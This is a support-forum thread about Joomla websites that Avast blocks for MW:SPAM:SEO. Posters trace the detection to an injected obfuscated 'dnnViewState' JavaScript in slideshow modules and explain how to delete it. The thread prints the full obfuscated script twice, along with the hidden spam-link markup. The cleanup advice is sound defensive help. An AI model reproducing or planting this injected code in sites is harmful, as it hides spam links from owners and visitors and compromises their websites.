Avast WEBforum
Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: ncgois on August 05, 2013, 04:23:36 PM
-
Hello
My website in joomla is being blocked by avast.
It's the only one to block it.
I've already reported to avast but still don't get an answer.
I've checked my site and there isn't nothing similar to the trojan they report.
Apreciate any help.
Website:www.naturales-tauromaquia.com
-
I just received the same report from Avast. I am running a Joomla 2.5 website with an Autson Slideshow. I am wondering if this may be the culprit. I am anxious to hear what you find out about your site and if it could be related.
Thanks!
-
I found this explanation on the net:
MW:SPAM:SEO is a backdoor link malware that redirect your link to another website. This is usually located in header.php, index.php and footer.php. To remove MW:SPAM:SEO malware, you will need to locate this code and delete it.
<script language=”JavaScript”>
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array(’9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’778787′,’949990793917947998942577939317′),l=x.length;while(++a<=l){m=x[l-a];
t=z=”;
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t=”;}}x[l-a]=z;}document.write(‘<’+x[0]+’ ‘+x[4]+’>.’+x[2]+’{‘+x[1]+’}</’+x[0]+’>’);}dnnViewState();
</script>
Tip: Try to sort the date modified so you can check which was recently changed. The file that was changed during the time you did not change anything is the time where your site usually get infected by the malware MW:SPAM:SEO.
Aside from that, you will also need to delete the line which start from <!–start-add-div-content–><p class=”dnn”> to <!–end-add-div-content–>. If this line does not exist, you can skip this step.
The problem is that I don't know where I can find it or which file have this code.
When I find it can I delete it?
What should I do?
Any Help?
-
sucuri report
http://sitecheck.sucuri.net/results/www.naturales-tauromaquia.com
-
Hi,
What have you already tried?
~!Donovan
-
See the insecurities listed here: https://asafaweb.com/Scan?Url=www.naturales-tauromaquia.com
polonus
-
My friends
Finally got the solution.
Go to your file explorer and enter this path: /modules/mod_AutsonSlideShow/tmpl/default.php
Edit the file and go to line 563 (on my case).
You should see this amount of code:
<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
Delete this code. If you don't feel confident to do it you can create a copy of the original file in case in goes wrong.
Know, go to the last line of the file and delete this tag:
<p class="dnn">By A <a href="http://www.autson.com/" title="web design company">Web Design</a></p>
Save it, and enjoy.
Hope it was usefull.
-
Please obfuscate script or better still only post images of the scripts.
The last thing that we want is avast alerting on example/suspect scripts in it own forums.
-
It is a Word Press hack script. Poster should realize that through posting this he could put other users at risk also,
polonus
-
I just got this message when Avast updated, on 3 sites Joomla 1.5
I did have that module, which I chgd, but I am still getting that error on the one site. I tried to restore older version, made the chg and still get message.
Must be another module that has problems. Can we get a better definition of the file that has the problem instead of "|{gzip}" It would help a lot.
-
and the problem URL is?
-
opps, I tried to edit the original post. The URL is xww.instepactivewear.com
Thanks
-
Search for the code in the default.php file of all your modules.
I had the same problem, and deleting the lines of the dnnViewState function resolved the problem - as ncgois pointed.
In my case, the modules with problems were AutsonSlideShow and iNowSlider.
-
Hallo forum,
i did the website http://www.aquamail-peseux.ch/ (http://www.aquamail-peseux.ch/). The site doesn't show up if you have installed the anti virus avast.
I have no idea if it is a JS problem or something else.
Can somebody help me?
Thanks
Silki
-
The first problem I see is that you all are using a outdated version of Joomla.
3.3 is the latest version.
Upgrade and see if the problem is solved.
For xww.instepactivewear.com :
Site is blacklisted
http://zulu.zscaler.com/submission/show/9c5e9fb070bc21d2b113f084825f42f3-1399465231 (http://zulu.zscaler.com/submission/show/9c5e9fb070bc21d2b113f084825f42f3-1399465231)
http://urlquery.net/report.php?id=1399463979523 (http://urlquery.net/report.php?id=1399463979523) (same IDS)
http://urlquery.net/report.php?id=1399461221521 (http://urlquery.net/report.php?id=1399461221521) (same IDS)
-
This is an old customer and the project is over. I can't update the website because it will cost mw too much time which i don't have.
Don't you have an idea? It works well with all other antivirus :-(
-
And also look here: http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fwww.aquamail-peseux.ch%2F
Known javascript malware: Known javascript malware.
Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
Joomla outdated for: Joomla Version 2.5.x for: htxp://www.aquamail-peseux.ch//language/en-GB/en-GB.ini
Javascript check: Suspicious
guage="javascript"> function dnnviewstate() { var a=0,m,v,t,z,x=new array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','9499
Read about this here: http://vel.joomla.org/articles/844-spotting-spam-code-in-malicious-extensions.html (see Example 2)
Cloaking Black Hat SEO -> https://productforums.google.com/forum/#!msg/webmasters/1ML9zaOTNIo/5AHEfXiecQMJ posted by 2 authors.
polonus
@Silki
See here with Fetch under scripts as to what script has to be cleansed for the site to no longer being alerted: http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fwww.aquamail-peseux.ch%2F&useragent=Fetch+useragent&accept_encoding=
look under scripts for the one starting with function dnnViewState() ////{ var a=0,m,v,t,z,x=new Array(/////// broken by me, pol.
D
-
Silki, since it is not your website tell the owner to update it and solve the problems.
It is the owners responsibility, not yours.
If he wants to hire (and pay) you, it is up to you if you take the job or not.
Fact remains that the problem is with the website and not with avast.
Other av's just don't have the detection that avast has.
Look at what Polonus posted.
Be glad that you are using avast and not another av. ;)
There is only one solution
Fix the problems with the website and avast will not block it.